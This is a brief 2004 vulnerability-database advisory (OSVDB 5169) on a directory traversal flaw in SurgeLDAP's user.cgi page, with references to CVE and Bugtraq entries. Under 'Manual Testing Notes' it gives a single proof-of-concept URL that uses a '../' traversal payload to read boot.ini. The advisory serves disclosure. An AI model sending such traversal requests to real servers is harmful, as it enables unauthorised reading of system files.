SurgeLDAP user.cgi page Variable Traversal Arbitrary File Access

2004-04-11T14:03:29
ID OSVDB:5169
Type osvdb
Reporter OSVDB
Modified 2004-04-11T14:03:29

Description

Manual Testing Notes

http://[victim]:6680/user.cgi?cmd=show&page=/../../../boot.ini

References:

Security Tracker: 1009732
Secunia Advisory ID: 11343
Other Advisory URL: http://members.lycos.co.uk/r34ct/main/SurgeLDAP%201.0g.txt
ISS X-Force ID: 15851
CVE-2004-2253
Bugtraq ID: 10103